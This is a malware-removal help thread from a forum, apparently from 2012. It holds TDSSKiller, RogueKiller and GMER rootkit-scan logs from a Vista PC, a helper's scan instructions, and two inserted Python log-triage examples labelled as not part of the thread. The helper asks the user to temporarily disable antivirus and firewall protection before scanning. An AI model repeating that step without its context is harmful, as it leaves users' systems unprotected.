00:54:06.0354 4376	vga (7d92be0028ecdedec74617009084b5ef) C:\Windows\system32\DRIVERS\vgapnp.sys
00:54:06.0401 4376	vga - ok
00:54:06.0447 4376	VgaSave (2e93ac0a1d8c79d019db6c51f036636c) C:\Windows\System32\drivers\vga.sys
00:54:06.0494 4376	VgaSave - ok
00:54:06.0525 4376	viaagp (045d9961e591cf0674a920b6ba3ba5cb) C:\Windows\system32\drivers\viaagp.sys
00:54:06.0541 4376	viaagp - ok
00:54:06.0557 4376	ViaC7 (56a4de5f02f2e88182b0981119b4dd98) C:\Windows\system32\drivers\viac7.sys
00:54:06.0619 4376	ViaC7 - ok
00:54:06.0635 4376	viaide (fd2e3175fcada350c7ab4521dca187ec) C:\Windows\system32\drivers\viaide.sys
00:54:06.0650 4376	viaide - ok
00:54:06.0744 4376	volmgr (69503668ac66c77c6cd7af86fbdf8c43) C:\Windows\system32\drivers\volmgr.sys
00:54:06.0759 4376	volmgr - ok
00:54:06.0900 4376	volmgrx (23e41b834759917bfd6b9a0d625d0c28) C:\Windows\system32\drivers\volmgrx.sys
00:54:06.0915 4376	volmgrx - ok
00:54:07.0009 4376	volsnap (147281c01fcb1df9252de2a10d5e7093) C:\Windows\system32\drivers\volsnap.sys
00:54:07.0025 4376	volsnap - ok
00:54:07.0118 4376	vsmraid (d984439746d42b30fc65a4c3546c6829) C:\Windows\system32\drivers\vsmraid.sys
00:54:07.0149 4376	vsmraid - ok
00:54:07.0368 4376	VSS (db3d19f850c6eb32bdcb9bc0836acddb) C:\Windows\system32\vssvc.exe
00:54:07.0430 4376	VSS - ok
00:54:07.0555 4376	W32Time (96ea68b9eb310a69c25ebb0282b2b9de) C:\Windows\system32\w32time.dll
00:54:07.0586 4376	W32Time - ok
00:54:07.0742 4376	W3SVC (9ca92191c8f18e8b491a5b28e63c07b7) C:\Windows\system32\inetsrv\iisw3adm.dll
00:54:07.0789 4376	W3SVC - ok
00:54:07.0945 4376	WacomPen (48dfee8f1af7c8235d4e626f0c4fe031) C:\Windows\system32\drivers\wacompen.sys
00:54:07.0992 4376	WacomPen - ok
00:54:08.0039 4376	Wanarp (55201897378cca7af8b5efd874374a26) C:\Windows\system32\DRIVERS\wanarp.sys
00:54:08.0070 4376	Wanarp - ok
00:54:08.0070 4376	Wanarpv6 (55201897378cca7af8b5efd874374a26) C:\Windows\system32\DRIVERS\wanarp.sys
00:54:08.0101 4376	Wanarpv6 - ok
00:54:08.0101 4376	WAS (9ca92191c8f18e8b491a5b28e63c07b7) C:\Windows\system32\inetsrv\iisw3adm.dll
00:54:08.0132 4376	WAS - ok
00:54:08.0226 4376	wcncsvc (a3cd60fd826381b49f03832590e069af) C:\Windows\System32\wcncsvc.dll
00:54:08.0257 4376	wcncsvc - ok
00:54:08.0288 4376	WcsPlugInService (11bcb7afcdd7aadacb5746f544d3a9c7) C:\Windows\System32\WcsPlugInService.dll
00:54:08.0319 4376	WcsPlugInService - ok
00:54:08.0382 4376	Wd (afc5ad65b991c1e205cf25cfdbf7a6f4) C:\Windows\system32\drivers\wd.sys
00:54:08.0397 4376	Wd - ok
00:54:08.0553 4376	Wdf01000 (b6f0a7ad6d4bd325fbcd8bac96cd8d96) C:\Windows\system32\drivers\Wdf01000.sys
00:54:08.0585 4376	Wdf01000 - ok
00:54:08.0709 4376	WdiServiceHost (abfc76b48bb6c96e3338d8943c5d93b5) C:\Windows\system32\wdi.dll
00:54:08.0741 4376	WdiServiceHost - ok
00:54:08.0741 4376	WdiSystemHost (abfc76b48bb6c96e3338d8943c5d93b5) C:\Windows\system32\wdi.dll
00:54:08.0787 4376	WdiSystemHost - ok
00:54:08.0850 4376	WebClient (04c37d8107320312fbae09926103d5e2) C:\Windows\System32\webclnt.dll
00:54:08.0865 4376	WebClient - ok
00:54:08.0912 4376	Wecsvc (ae3736e7e8892241c23e4ebbb7453b60) C:\Windows\system32\wecsvc.dll
00:54:08.0943 4376	Wecsvc - ok
00:54:09.0131 4376	wercplsupport (670ff720071ed741206d69bd995ea453) C:\Windows\System32\wercplsupport.dll
00:54:09.0162 4376	wercplsupport - ok
00:54:09.0255 4376	WerSvc (32b88481d3b326da6deb07b1d03481e7) C:\Windows\System32\WerSvc.dll
00:54:09.0318 4376	WerSvc - ok
00:54:09.0583 4376	WinDefend (4575aa12561c5648483403541d0d7f2b) C:\Program Files\Windows Defender\mpsvc.dll
00:54:09.0614 4376	WinDefend - ok
00:54:09.0614 4376	WinHttpAutoProxySvc - ok
00:54:09.0755 4376	Winmgmt (6b2a1d0e80110e3d04e6863c6e62fd8a) C:\Windows\system32\wbem\WMIsvc.dll
00:54:09.0786 4376	Winmgmt - ok
00:54:09.0942 4376	WinRM (7cfe68bdc065e55aa5e8421607037511) C:\Windows\system32\WsmSvc.dll
00:54:10.0035 4376	WinRM - ok
00:54:10.0207 4376	Wlansvc (c008405e4feeb069e30da1d823910234) C:\Windows\System32\wlansvc.dll
00:54:10.0301 4376	Wlansvc - ok
00:54:10.0691 4376	wlidsvc (0a70f4022ec2e14c159efc4f69aa2477) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
00:54:10.0987 4376	wlidsvc - ok
00:54:11.0502 4376	WmiAcpi (701a9f884a294327e9141d73746ee279) C:\Windows\system32\drivers\wmiacpi.sys
00:54:11.0549 4376	WmiAcpi - ok
00:54:11.0705 4376	wmiApSrv (43be3875207dcb62a85c8c49970b66cc) C:\Windows\system32\wbem\WmiApSrv.exe
00:54:11.0736 4376	wmiApSrv - ok
00:54:12.0001 4376	WMPNetworkSvc (3978704576a121a9204f8cc49a301a9b) C:\Program Files\Windows Media Player\wmpnetwk.exe
00:54:12.0095 4376	WMPNetworkSvc - ok
00:54:12.0173 4376	WPCSvc (cfc5a04558f5070cee3e3a7809f3ff52) C:\Windows\System32\wpcsvc.dll
00:54:12.0204 4376	WPCSvc - ok
00:54:12.0266 4376	WPDBusEnum (801fbdb89d472b3c467eb112a0fc9246) C:\Windows\system32\wpdbusenum.dll
00:54:12.0313 4376	WPDBusEnum - ok
00:54:12.0407 4376	WpdUsb (de9d36f91a4df3d911626643debf11ea) C:\Windows\system32\DRIVERS\wpdusb.sys
00:54:12.0438 4376	WpdUsb - ok
00:54:12.0750 4376	WPFFontCache_v0400 (dcf3e3edf5109ee8bc02fe6e1f045795) C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
00:54:12.0921 4376	WPFFontCache_v0400 - ok
00:54:13.0015 4376	ws2ifsl (e3a3cb253c0ec2494d4a61f5e43a389c) C:\Windows\system32\drivers\ws2ifsl.sys
00:54:13.0046 4376	ws2ifsl - ok
00:54:13.0171 4376	wscsvc (1ca6c40261ddc0425987980d0cd2aaab) C:\Windows\system32\wscsvc.dll
00:54:13.0187 4376	wscsvc - ok
00:54:13.0265 4376	WSDPrintDevice (4422ac5ed8d4c2f0db63e71d4c069dd7) C:\Windows\system32\DRIVERS\WSDPrint.sys
00:54:13.0280 4376	WSDPrintDevice - ok
00:54:13.0280 4376	WSearch - ok
00:54:13.0623 4376	wuauserv (6298277b73c77fa99106b271a7525163) C:\Windows\system32\wuaueng.dll
00:54:13.0779 4376	wuauserv - ok
00:54:14.0216 4376	WUDFRd (ac13cb789d93412106b0fb6c7eb2bcb6) C:\Windows\system32\DRIVERS\WUDFRd.sys
00:54:14.0263 4376	WUDFRd - ok
00:54:14.0357 4376	wudfsvc (575a4190d989f64732119e4114045a4f) C:\Windows\System32\WUDFSvc.dll
00:54:14.0403 4376	wudfsvc - ok
00:54:14.0528 4376	xnacc (9eea6d029fef5f3016d089b1a603837d) C:\Windows\system32\DRIVERS\xnacc.sys
00:54:14.0575 4376	xnacc - ok
00:54:14.0622 4376	MBR (0x1B8) (5b5e648d12fcadc244c1ec30318e1eb9) \Device\Harddisk0\DR0
00:54:15.0277 4376	\Device\Harddisk0\DR0 ( TDSS File System ) - warning
00:54:15.0277 4376	\Device\Harddisk0\DR0 - detected TDSS File System (1)
00:54:15.0324 4376	Boot (0x1200) (4c665477e7a79fdb1f3f319443854ef8) \Device\Harddisk0\DR0\Partition0
00:54:15.0324 4376	\Device\Harddisk0\DR0\Partition0 - ok
00:54:15.0324 4376	============================================================
00:54:15.0324 4376	Scan finished
00:54:15.0324 4376	============================================================
00:54:15.0339 2928	Detected object count: 14
00:54:15.0339 2928	Actual detected object count: 14
00:56:11.0364 2928	BVRPMPR5 ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0365 2928	BVRPMPR5 ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0368 2928	IDriverT ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0369 2928	IDriverT ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0371 2928	KR10I ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0371 2928	KR10I ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0374 2928	KR10N ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0374 2928	KR10N ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0377 2928	KR3NPXP ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0377 2928	KR3NPXP ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0408 2928	NCHSSVAD ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0408 2928	NCHSSVAD ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0408 2928	ServiceLayer ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0408 2928	ServiceLayer ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0408 2928	sptd ( LockedFile.Multi.Generic ) - skipped by user
00:56:11.0408 2928	sptd ( LockedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0408 2928	StarWindServiceAE ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0408 2928	StarWindServiceAE ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0408 2928	TNaviSrv ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0408 2928	TNaviSrv ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0423 2928	TODDSrv ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0423 2928	TODDSrv ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0423 2928	UleadBurningHelper ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0423 2928	UleadBurningHelper ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0423 2928	USBAAPL ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0423 2928	USBAAPL ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0423 2928	\Device\Harddisk0\DR0 ( TDSS File System ) - skipped by user
00:56:11.0423 2928	\Device\Harddisk0\DR0 ( TDSS File System ) - User select action: Skip 
00:56:43.0173 3104	Deinitialize success


----------



## gagraptor (May 23, 2012)

00:51:38.0656 4056	TDSS rootkit removing tool 2.7.36.0 May 21 2012 16:40:16
00:51:38.0941 4056	============================================================
00:51:38.0941 4056	Current date / time: 2012/06/01 00:51:38.0941
00:51:38.0941 4056	SystemInfo:
00:51:38.0941 4056	
00:51:38.0941 4056	OS Version: 6.0.6002 ServicePack: 2.0
00:51:38.0941 4056	Product type: Workstation
00:51:38.0941 4056	ComputerName: GAGAN-PC
00:51:38.0941 4056	UserName: GAGAN
00:51:38.0941 4056	Windows directory: C:\Windows
00:51:38.0941 4056	System windows directory: C:\Windows
00:51:38.0941 4056	Processor architecture: Intel x86
00:51:38.0941 4056	Number of processors: 2
00:51:38.0941 4056	Page size: 0x1000
00:51:38.0941 4056	Boot type: Normal boot
00:51:38.0941 4056	============================================================
00:51:49.0300 4056	Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
00:51:49.0303 4056	============================================================
00:51:49.0304 4056	\Device\Harddisk0\DR0:
00:51:49.0304 4056	MBR partitions:
00:51:49.0304 4056	\Device\Harddisk0\DR0\Partition0: MBR, Type 0x7, StartLBA 0x2EE800, BlocksNum 0x1CED7000
00:51:49.0304 4056	============================================================
00:51:49.0355 4056	C: <-> \Device\Harddisk0\DR0\Partition0
00:51:49.0356 4056	============================================================
00:51:49.0356 4056	Initialize success
00:51:49.0356 4056	============================================================
00:52:18.0831 2772	Deinitialize success

I found 2 logs; I just posted both.


----------
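An added example (not part of the original thread and not TDSSKiller's own code) for reading a TDSSKiller log like the one posted above. In that log, 13 of the 14 "detected" objects are UnsignedFile/LockedFile warnings on vendor drivers and services, which only say the file is unsigned or could not be opened; the one finding that is not a heuristic is the "TDSS File System" hit on \Device\Harddisk0\DR0, and it was skipped. The Python below parses the "detected" and "User select action" line shapes and separates the two classes. SAMPLE_LOG is a constructed excerpt assembled from lines of the posted log; the "timestamp pid<tab>body" layout is assumed from it.

```python
"""Triage a Kaspersky TDSSKiller log: which detections matter and what was done about them.

Added example: not part of the original thread and not TDSSKiller's own code. It parses
the two line shapes visible in the posted log,
    "<object> - detected <verdict> (<n>)"
    "<object> ( <verdict> ) - User select action: <action>"
and separates warning-level heuristics (UnsignedFile.*, LockedFile.*) from findings that
need a decision, such as the disk-level "TDSS File System" hit. SAMPLE_LOG is a
constructed excerpt; the "timestamp<space>pid<tab>body" layout is assumed from the log.
"""
import re

LINE_RE = re.compile(r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+)\s+(?P<pid>\d+)\s+(?P<body>.*)$")
DETECTED_RE = re.compile(r"^(?P<obj>.+?) - detected (?P<verdict>.+?) \((?P<count>\d+)\)\s*$")
ACTION_RE = re.compile(
    r"^(?P<obj>.+?) \( (?P<verdict>.+?) \) - User select action: (?P<action>.+?)\s*$"
)
COUNT_RE = re.compile(r"^Detected object count: (?P<count>\d+)\s*$")

# Verdict families TDSSKiller itself reports as "warning", not as malware.
GENERIC_PREFIXES = ("UnsignedFile.", "LockedFile.")

SAMPLE_LOG = "\n".join([  # constructed excerpt, same line shapes as the posted log
    "00:53:50.0629 4376\tServiceLayer ( UnsignedFile.Multi.Generic ) - warning",
    "00:53:50.0629 4376\tServiceLayer - detected UnsignedFile.Multi.Generic (1)",
    "00:53:54.0467 4376\tsptd ( LockedFile.Multi.Generic ) - warning",
    "00:53:54.0467 4376\tsptd - detected LockedFile.Multi.Generic (1)",
    "00:54:14.0622 4376\tMBR (0x1B8) (5b5e648d12fcadc244c1ec30318e1eb9) \\Device\\Harddisk0\\DR0",
    "00:54:15.0277 4376\t\\Device\\Harddisk0\\DR0 ( TDSS File System ) - warning",
    "00:54:15.0277 4376\t\\Device\\Harddisk0\\DR0 - detected TDSS File System (1)",
    "00:54:15.0339 2928\tDetected object count: 3",
    "00:56:11.0408 2928\tServiceLayer ( UnsignedFile.Multi.Generic ) - User select action: Skip",
    "00:56:11.0408 2928\tsptd ( LockedFile.Multi.Generic ) - User select action: Skip",
    "00:56:11.0423 2928\t\\Device\\Harddisk0\\DR0 ( TDSS File System ) - User select action: Skip",
])


def is_generic(verdict):
    return verdict.startswith(GENERIC_PREFIXES)


def is_disk_level(obj):
    # Objects named by device path (MBR / raw disk) rather than by service name.
    return obj.startswith("\\Device\\")


def triage(log_text):
    detections = {}
    declared = None
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        body = m.group("body")
        d = DETECTED_RE.match(body)
        if d:
            obj, verdict = d.group("obj"), d.group("verdict")
            detections[obj] = {
                "verdict": verdict,
                "count": int(d.group("count")),
                "action": None,          # filled in from the summary section, if present
                "generic": is_generic(verdict),
                "disk_level": is_disk_level(obj),
            }
            continue
        a = ACTION_RE.match(body)
        if a:
            entry = detections.get(a.group("obj"))
            if entry is not None:     # ignore actions for objects never reported as detected
                entry["action"] = a.group("action")
            continue
        c = COUNT_RE.match(body)
        if c:
            declared = int(c.group("count"))
    parsed = sum(e["count"] for e in detections.values())
    return {
        "detections": detections,
        "declared_count": declared,
        "parsed_count": parsed,
        # A mismatch means the log was truncated or a line shape was not recognised.
        "count_mismatch": declared is not None and declared != parsed,
        "skipped_generic": sorted(o for o, e in detections.items()
                                  if e["generic"] and e["action"] == "Skip"),
        # Non-generic findings left untreated (skipped, or no action recorded at all).
        "needs_attention": sorted(o for o, e in detections.items()
                                  if not e["generic"] and e["action"] in (None, "Skip")),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    print(f"{result['parsed_count']} detections (log declares {result['declared_count']})")
    print("generic warnings skipped:", ", ".join(result["skipped_generic"]))
    for obj in result["needs_attention"]:
        e = result["detections"][obj]
        print(f"NEEDS ATTENTION: {obj} -> {e['verdict']} (action: {e['action']})")
```

Run it against the full log pasted above (read the file and pass its text to `triage`) and `needs_attention` comes back with only the DR0 entry, which is the finding the helper's next question about an earlier TDL4 infection is aimed at. The `count_mismatch` flag is there because a pasted log is often cut short; if the declared count and the parsed count disagree, ask for the file rather than reasoning from the excerpt.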



## Mark1956 (May 7, 2011)

Thanks for the logs; you're doing fine. The infection is proving tricky to find, but we will get there.

Are you aware of any previous TDL4 infection that was removed?

Please start your browser with no add-ons and tell me if the pop-up still appears: How to run Firefox and Internet Explorer with no add-ons

Please also confirm whether the pop-up appears with one specific browser or with both of them.

If disabling add-ons still fails to stop the popup then continue with these instructions.

*STEP 1*
Download RogueKiller (by tigzy) and save it directly to your Desktop.
On the web page click on this:

Quit all programs 
Start RogueKiller.exe 
Wait until Prescan has finished ... 
Ensure all boxes are ticked under "Report" tab. 
Click on Scan. 
Click on Report when complete. 
Copy/paste the content of the report into your next reply. 

*STEP 2*
Please download *GMER* from one of the following locations and save it to your desktop:

Main Mirror <- This version will download a randomly named .exe file (Recommended)
Zipped Mirror <- This version will download a zip file you will need to extract first.

Disconnect from the Internet and *temporarily disable* your anti-virus, Firewall and any anti-malware real-time protection *before* performing a scan so they will not conflict with gmer's driver.
Click *this link* to see a list of such programs and how to disable them.
Double-click on the *randomly named* GMER file (i.e. n7gmo46c.exe) and allow the gmer.sys driver to load if asked.
_Note: If you downloaded the zipped version, extract the file to its own folder such as C:\gmer and then double-click on gmer.exe._

GMER will open to the Rootkit/Malware tab and perform an automatic quick scan when first run. _(do not use the computer while the scan is in progress)_
If you receive a WARNING!!! about rootkit activity and are asked to fully scan your system...click *NO*.
On the right side panel, several boxes have been checked. Please *UNCHECK the following:*
*IAT/EAT*
*Drives*/Partition other than Systemdrive (typically C:\) 
*Show All* *<- don't miss this one*
Now click the *Scan* button. If you see a rootkit warning window, click OK.
When the scan is finished, click the *Save...* button to save the scan results to your Desktop. Save the file as *gmer.log*.
Click the *Copy* button and paste the results into your next reply.
Exit GMER and be sure to *re-enable* your anti-virus, Firewall and any other security programs you had disabled.
-- If GMER crashes or keeps resulting in BSODs, deselect (uncheck) *Devices*, *Sections*, and *Files* along with the other items mentioned.
-- If you still encounter problems, try running GMER in safe mode.


----------



## gagraptor (May 23, 2012)

I'm sorry I was not very clear about the popup. It starts as soon as I turn on the computer and is above all windows even if I've not opened any browser. If I'm not connected to the internet it still pops up but does not become the active window.


----------



## gagraptor (May 23, 2012)

RogueKiller V7.5.2 [05/30/2012] by Tigzy
mail: tigzyRK<at>gmail<dot>com
Feedback: http://www.geekstogo.com/forum/files/file/413-roguekiller/
Blog: http://tigzyrk.blogspot.com

Operating System: Windows Vista (6.0.6002 Service Pack 2) 32 bits version
Started in : Normal mode
User: GAGAN [Admin rights]
Mode: Scan -- Date: 06/02/2012 00:26:43

¤¤¤ Bad processes: 0 ¤¤¤

¤¤¤ Registry Entries: 5 ¤¤¤
[HJ] HKCU\[...]\Advanced : Start_ShowPrinters (0) -> FOUND
[HJ] HKLM\[...]\NewStartPanel : {59031a47-3f72-44a7-89c5-5595fe6b30ee} (1) -> FOUND
[HJ] HKLM\[...]\NewStartPanel : {20D04FE0-3AEA-1069-A2D8-08002B30309D} (1) -> FOUND
[HJ] HKCU\[...]\ClassicStartMenu : {645FF040-5081-101B-9F08-00AA002F954E} (1) -> FOUND
[HJ] HKCU\[...]\NewStartPanel : {645FF040-5081-101B-9F08-00AA002F954E} (1) -> FOUND

¤¤¤ Particular Files / Folders: ¤¤¤

¤¤¤ Driver: [LOADED] ¤¤¤

¤¤¤ Infection : ¤¤¤

¤¤¤ HOSTS File: ¤¤¤
127.0.0.1 localhost

¤¤¤ MBR Check: ¤¤¤

+++++ PhysicalDrive0: FUJITSU MHX2250BT ATA Device +++++
--- User ---
[MBR] 5fda213a8146ffd7df142aa50ce8c7a4
[BSP] 2c60e3e08a4fa002faabe1a5a0bd19e2 : Windows Vista MBR Code
Partition table:
0 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 2048 | Size: 1500 Mo
1 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 3074048 | Size: 236974 Mo
User = LL1 ... OK!
User = LL2 ... OK!

Finished : << RKreport[1].txt >>
RKreport[1].txt

I'm not sure about the virus you mentioned. I have had a few serious infections which were solved with Malwarebytes, mostly in safe mode. I have more than one person using this computer and have been infected with fake antivirus viruses more than once.


----------
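An added example (not part of the original thread and not code from TDSSKiller or RogueKiller) that cross-checks the disk geometry the two tools reported above. TDSSKiller's second log gives the drive size and the Windows partition in hex (StartLBA 0x2EE800, BlocksNum 0x1CED7000); RogueKiller's MBR check gives the same partition in decimal (offset 3074048, 236974 Mo) plus a hidden 0x27 recovery partition in front of it. The Python below parses both, confirms the two tools describe the same Windows partition, and lists the sectors no partition covers: the MBR area at the front of the disk and the unpartitioned tail at the end, which is where the TDL4 family keeps its hidden file system and therefore the first place to image and inspect after a "TDSS File System" warning. It assumes 512-byte sectors (TDSSKiller reports SectorSize 0x200) and reads RogueKiller's "Mo" as MiB, i.e. 2048 sectors; the two logs agree to the sector under that reading. The excerpts are copied from the logs above.

```python
"""Cross-check the disk geometry reported by TDSSKiller and by RogueKiller.

Added example: not part of the original thread and not code from either tool.
Assumptions: 512-byte sectors (TDSSKiller reports SectorSize 0x200) and RogueKiller's
"Mo" meaning MiB, i.e. 2048 sectors. The excerpts below are copied from the posted logs.
"""
import re

SECTOR_BYTES = 512
SECTORS_PER_MIB = (1024 * 1024) // SECTOR_BYTES  # 2048

TDSS_EXCERPT = "\n".join([
    "00:51:49.0300 4056\tDrive \\Device\\Harddisk0\\DR0 - Size: 0x3A38B2E000 (232.89 Gb), "
    "SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, "
    "Type 'K0', Flags 0x00000050",
    "00:51:49.0304 4056\t\\Device\\Harddisk0\\DR0\\Partition0: MBR, Type 0x7, StartLBA 0x2EE800, "
    "BlocksNum 0x1CED7000",
])
RK_EXCERPT = "\n".join([
    "0 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 2048 | Size: 1500 Mo",
    "1 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 3074048 | Size: 236974 Mo",
])

TDSS_DRIVE_RE = re.compile(
    r"Drive (?P<dev>\\Device\\\S+) - Size: (?P<size>0x[0-9A-Fa-f]+) .*SectorSize: (?P<ss>0x[0-9A-Fa-f]+)"
)
TDSS_PART_RE = re.compile(
    r"Partition(?P<n>\d+): MBR, Type (?P<type>0x[0-9A-Fa-f]+), "
    r"StartLBA (?P<start>0x[0-9A-Fa-f]+), BlocksNum (?P<len>0x[0-9A-Fa-f]+)"
)
RK_PART_RE = re.compile(
    r"^(?P<n>\d+) - \[(?P<flags>[^\]]*)\] (?P<label>.+?) \((?P<type>0x[0-9A-Fa-f]+)\) "
    r"\[(?P<vis>[^\]]*)\] Offset \(sectors\): (?P<start>\d+) \| Size: (?P<mib>\d+) Mo"
)


def parse_tdsskiller(text):
    """Return (disk, partitions); sizes are converted from hex to sector counts."""
    disk, parts = {}, []
    for line in text.splitlines():
        m = TDSS_DRIVE_RE.search(line)
        if m:
            sector_size = int(m.group("ss"), 16)
            disk = {"device": m.group("dev"), "sector_size": sector_size,
                    "total_sectors": int(m.group("size"), 16) // sector_size}
            continue
        m = TDSS_PART_RE.search(line)
        if m:
            start, length = int(m.group("start"), 16), int(m.group("len"), 16)
            parts.append({"type": int(m.group("type"), 16), "start": start, "end": start + length})
    if not disk:
        raise ValueError("no 'Drive ... Size:' line found in TDSSKiller excerpt")
    return disk, parts


def parse_roguekiller(text):
    """Return partitions from RogueKiller's MBR check; 'Mo' sizes become sector counts."""
    parts = []
    for line in text.splitlines():
        m = RK_PART_RE.match(line.strip())
        if m:
            start, length = int(m.group("start")), int(m.group("mib")) * SECTORS_PER_MIB
            parts.append({"type": int(m.group("type"), 16), "start": start,
                          "end": start + length, "active": m.group("flags") == "ACTIVE"})
    return parts


def unpartitioned_ranges(parts, total_sectors):
    """(start, length) sector ranges no partition covers. The leading range includes
    sector 0, i.e. the MBR itself; the trailing range is the unpartitioned tail."""
    ranges, cursor = [], 0
    for p in sorted(parts, key=lambda p: p["start"]):
        if p["start"] > cursor:
            ranges.append((cursor, p["start"] - cursor))
        cursor = max(cursor, p["end"])
    if total_sectors > cursor:
        ranges.append((cursor, total_sectors - cursor))
    return ranges


def cross_check(tdss_text, rk_text):
    disk, tdss_parts = parse_tdsskiller(tdss_text)
    rk_parts = parse_roguekiller(rk_text)
    rk_by_key = {(p["type"], p["start"]): p for p in rk_parts}
    tdss_keys = {(p["type"], p["start"]) for p in tdss_parts}
    # Every partition TDSSKiller enumerated must appear in RogueKiller's table with the
    # same type, start and end; anything else is a disagreement worth explaining.
    mismatches = []
    for p in tdss_parts:
        q = rk_by_key.get((p["type"], p["start"]))
        if q is None or q["end"] != p["end"]:
            mismatches.append(p)
    return {
        "total_sectors": disk["total_sectors"],
        "mismatches": mismatches,
        "rk_only": [p for p in rk_parts if (p["type"], p["start"]) not in tdss_keys],
        "unpartitioned": unpartitioned_ranges(rk_parts + tdss_parts, disk["total_sectors"]),
    }


if __name__ == "__main__":
    r = cross_check(TDSS_EXCERPT, RK_EXCERPT)
    print("disk sectors:", r["total_sectors"])
    print("partitions the tools disagree on:", r["mismatches"] or "none")
    for start, length in r["unpartitioned"]:
        print(f"unpartitioned: sectors {start}..{start + length - 1} ({length} sectors)")
```

For this disk the two tools agree exactly on the Windows partition, the only partition RogueKiller sees that TDSSKiller did not list is the hidden 0x27 recovery partition, and the unpartitioned tail is 368 sectors starting at LBA 488396800. RogueKiller also reports the MBR bootstrap as stock "Windows Vista MBR Code", so if the "TDSS File System" warning is real, the evidence is in that tail (and in the 2048-sector area in front of the first partition), not in the MBR code itself, which is consistent with the helper asking about a previous TDL4 clean-up.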



## gagraptor (May 23, 2012)

GMER 1.0.15.15641 - http://www.gmer.net
Rootkit scan 2012-06-02 00:49:08
Windows 6.0.6002 Service Pack 2 
Running: 1ciu4pjc.exe; Driver: C:\Users\GAGAN\AppData\Local\Temp\pwtoqpow.sys

---- System - GMER 1.0.15 ----

INT 0x52 ? 865B1BF8
INT 0x52 ? 865B1BF8
INT 0x72 ? 865B1BF8
INT 0x92 ? 8553CBF8
INT 0xA2 ? 8553CBF8
INT 0xB1 ? 84BACBF8
INT 0xB1 ? 84BACBF8
INT 0xB2 ? 8553CBF8
INT 0xB2 ? 8553CBF8
INT 0xB2 ? 8553CBF8
INT 0xB3 ? 865B1BF8

---- Registry - GMER 1.0.15 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\[email protected] 771343423
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\[email protected] 285507792
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\[email protected] 2
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04 
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\[email protected] 0
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\[email protected] 0xAD 0x66 0x47 0x5B ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\[email protected] C:\Program Files\Alcohol Soft\Alcohol 52\
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001 
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\[email protected] 0xBB 0x65 0xF9 0xC7 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\[email protected] 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\jdgg40 
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\[email protected]  0x6E 0x90 0x05 0x13 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\jdgg41 
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\[email protected] 0xC2 0x5F 0x4E 0x41 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4 
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\[email protected] C:\Program Files\DAEMON Tools Lite\
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\[email protected] 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\[email protected] 0xA8 0x7C 0x8B 0xB0 ...
